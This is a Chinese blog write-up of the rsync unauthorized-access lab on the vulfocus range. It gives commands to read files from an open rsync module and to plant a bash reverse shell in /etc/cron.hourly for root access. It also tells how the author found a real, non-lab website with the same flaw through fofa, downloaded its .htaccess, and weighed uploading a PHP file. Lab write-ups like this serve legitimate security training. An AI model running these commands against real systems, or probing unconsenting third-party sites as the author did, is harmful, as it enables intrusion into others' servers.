Rsync未授权访问-vulfocus

最新推荐文章于 2024-06-26 16:17:05 发布
最新推荐文章于 2024-06-26 16:17:05 发布
阅读量606 收藏 20
点赞数 11
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0529/article/details/139906967
版权

1.原理

Rsync是linux上文件传输的协议,如果有返回直接可以看到,部分主机使用协议的时候不会加密码,就容易造成未授权访问漏洞

2.复现

打开vulfocus.io,搜索rsync关键字,打开环境
在自己的主机上去连接远程服务器:
rsync rsync://123.58.224.8:33546/
利用rsync去连接目的ip地址的对应端口

返回src或者其他文件名字+path就存在使用了这个协议
登入src连接发现没有设置密码
rsync rsync://123.58.224.8:33546/src
我们直接查找要填入的flag
 rsync rsync://123.58.224.8:33546/src/tmp/f*

直接交了就行

3.反弹shell

当然我们不想只要得到信息,我们要争取可以拿到这台主机的权限,这时候我们需要反弹shell,让我们可以登入

3.1 linux计时任务

Linux crontab是用来定期执行程序的命令。
当安装完成操作系统之后,默认便会启动此任务调度命令。
crond 命令每分锺会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。
存放crontab周期性计划任务的文件:/var/spool/cron/用户名  (按用户分类)
cron服务的日志文件 (记录创建、查看、执行文件):/var/log/cron  
crontab服务的配置文件:**/etc/crontab**
注意:新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行。
而 linux 任务调度的工作主要分为以下两类:
1、系统执行的工作:系统周期性所要执行的工作,如备份系统数据、清理缓存
2、个人执行的工作:某个用户定期要做的工作,例如每隔10分钟检查邮件服务器是否有新信,这些工作可由每个用户自行设置

3.2 复现

下载文件:rsync rsync://123.58.224.8:22101/src/etc/crontab   /root/cron.txt(你的主机上对应位置保存)

我们的目标就是第一个,17分钟执行一次的这个
写一个shell到这个文件之后等待监听就可以了
shell:/bin/bash -i >& /dev/tcp/自己的ip/对应端口 0>&1
创建文件:touch shell
写入shell:vim shell
加上权限:chmod 777 shell
提交到远程主机:rsync -av /root/shell rsync://123.58.224.8:50461/src/etc/cron.hourly

开另一个窗口监听端口:

等待够时间就可以反弹shell了
由于靶场的原因可能无法等待17分钟就关闭了,很可能是没办法看到效果的
我们可以尝试在fofa上面看看有没有相关类型的漏洞:我找了一个,虽然这个file不是在root下,只是搭在了网站上面,但我们可以发现这个漏洞在现实中任然存在:

我发现可以直接下载.htaccess,我有思路是写入替换配置文件或者是上传一个php文件,但是由于也是国内的网站就先不动了

免责声明:本篇文章纯属技术交流,没有任何教导网络攻击的意思

小狗学士
关注
  • 11
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现-rsync-授权访问vulfocus/rsync-common
10-16 1249
rsync-授权访问
rsync 授权访问漏洞
weixin_45366453的博客
07-05 626
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。使用Vulfocus 漏洞威胁分析平台在线靶场测试: 利用定时任务反弹shell获取信息 .创建文件 上传文件 利用msf框架将想要测试的ip批量测试 参考链接 Vulhub - Docker-Compose file for vulnerability environment...
服务安全-应用协议rsync授权&ssh漏洞复现
rumil的博客
10-16 1355
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。
授权漏洞vulfocu靶场实战
beichenyyds的博客
03-03 6849
rsync授权漏洞 打开会有一个输入flag的文本框,所以我们需要查找flag如图 把网站的ip信息收集到如图 在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入 rsync rsync://123.58.236.76 :19358/src/ 上面也说了flag在tmp目录下所以输入 rsync rsync://123.58.236.76:19358/src/tmp/ 可以查到flag 如图 复制到靶场flag位置 可以看到
应用协议安全:Rsync-common 授权访问.
网络安全领域___专研者.
11-15 1026
Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。
【小迪安全2023】第57天:服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
人若无名,便可专心练剑
04-24 856
程序使用 JavaFX 编写,便于跨平台使用,相比与web端的方式查询,其启动与搜索速度都有比较明显的提升!利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破。这里由于节省时间,直接告诉他账号,真是环境账号密码都需要利用字典。ftp爆破最大的特点是账号密码都不确定,账号密码都需要使用字典。为了确认是否正确,这里开一台靶机测试,扫描后发现成功发现了。3、文件传输-FTP&Rsync&弱口令&漏洞。2、远程控制-RDP&RDP&弱口令&漏洞。访问漏洞地址,是个apache页面。
关于vulnhub靶场获取flag基本流程和方法
qq_54030686的博客
11-14 2423
关于vulnhub靶场获取flag基本流程和方法 将目标虚拟机和kali(个人主机)使用桥接或者nat模式连接到同一个C段下 1.发现 使用nmap,netdiscover进行主机发现,找到你的目标主机(192.168.0.1/24,192.168…0.1-255) nmap 参数 -sn 不扫描端口,只ping主机 -PE 通过ICMP echo判定主机是否存活 2.端口探测 使用nmap 进行扫描 使用-p 65535 进行全端口扫描 –A综合扫描 -O 系统扫描 端口容易出现的问题 21
常见的网络安全面试题目(个人总结)
weixin_53139899的博客
03-20 4362
本文总结一些常见的安全知识,供大家学习参考!
开源攻防武器项目
Websec
07-08 4036
首先恭喜你发现了宝藏。本项目集成了全网优秀的开源攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...),漏洞利用工具(各大CMS利用工具、中间件利用工具等项目........),内网渗透工具(隧道代理、密码提取.....)、应急响应工具、甲方运维工具、等其他安全攻防资料整理,供攻防双方使用。通用漏洞类:基础漏洞类:.........
rsync-3.1.2-10.el7.x86_64.rpm
10-23
适用于Centos7.9的rsync 工具安装包 rsync-3.1.2-10.el7.x86_64.rpm
ranger-2.1.0-usersync.tar.gz
08-09
ranger-2.1.0-usersync.tar.gz
rsync3.0.9+inotify-tools3.1.14
03-29
rsync和inotify-tools是两种在Linux环境中广泛使用的工具,它们在系统管理和自动化运维中扮演着重要角色。这里我们详细探讨这两个工具的功能、用途以及如何结合使用以实现服务器之间的文件实时同步。 首先,rsync是...
rsync-3.1.2-4.el7.x86_64.rpm
06-29
rsync-3.1.2-4.el7.x86_64.rpm linux系统下rsync安装包
aix下rsync安装包
10-10
在IT领域,尤其是在系统管理与数据同步操作中,`rsync`是一个不可或缺的工具。它在各种操作系统上广泛使用,包括Linux和Unix-like系统,如AIX。本篇文章将详细介绍在AIX环境下如何安装和使用`rsync`,以及它在跨平台...
国际网络专线怎么开通?
lxzn123的博客
06-25 345
一个优秀的服务商,应具备广泛的全球网络覆盖能力,能根据企业的具体需求,提供定制化的网络解决方案。在全球化日益加速的今天,企业越来越需要稳定、高效的网络来支撑他们的跨国业务。同时,选择一个负责任的服务商,将确保网络专线的长期稳定运行,为企业的国际化发展提供强有力的网络支撑。这一阶段,服务商会确定最佳的网络路径,配置合适的网络设备,确保数据在跨国传输过程中的稳定性和安全性。一个优秀的服务商,不仅技术团队专业实力强,还要能够提供7*24小时的快速响应,让企业在享受高质量网络服务的同时,也能获得全方位的售后支持。
Qt | QSS自定义部件的外观
m0_45463480的博客
06-24 207
Qt | QSS自定义部件的外观
Python爬虫使用的IP协议主要是什么
最新发布
qq_42992840的博客
06-26 389
TCP/IP不是一个协议,而是一个协议族的统称,里面包括了IP协议、TCP协议、UDP协议等。在Python爬虫中,主要使用的是TCP/IP协议族中的HTTP协议和HTTPS协议,这两个协议都是基于TCP/IP的。除了HTTP和HTTPS协议外,Python爬虫还可能会使用到其他基于TCP/IP的协议,如FTP(文件传输协议)用于文件下载,SMTP(简单邮件传输协议)用于发送邮件等。总的来说,Python爬虫主要使用的IP协议是TCP/IP协议族中的HTTP和HTTPS协议。
串口小工具(来源网络,源码修改)
HongDaYu的搬砖之路
06-25 248
从CSDN 中的一位博主的分享做了一些修改。QtSerial 的配和更稳定些。
#!/bin/bash rsync -avz rsync -avz rsync -avz rsync -avz
07-23
这个脚本看起来只是简单地执行了四次相同的 rsync 命令,并没有指定具体的源文件和目标位置,因此无法完成实际的文件同步操作。如果你想要同步文件,你需要提供源文件和目标位置的具体路径。 以下是一个示例脚本,它使用循环来执行四次 rsync 命令,并指定了源文件和目标位置: ```bash #!/bin/bash # 设置需要同步的服务器列表 servers=("AS2" "AS3" "AS4") # 设置需要同步的文件或目录 source_dir="/path/to/source" target_dir="/path/to/target" # 循环同步文件到每个服务器 for server in "${servers[@]}"; do rsync -avz "$source_dir" "$server:$target_dir" done ``` 请将 `source_dir` 替换为源文件或目录的实际路径,将 `target_dir` 替换为目标位置的实际路径,然后运行脚本。这样,它将会按照你指定的路径来同步文件到每个服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值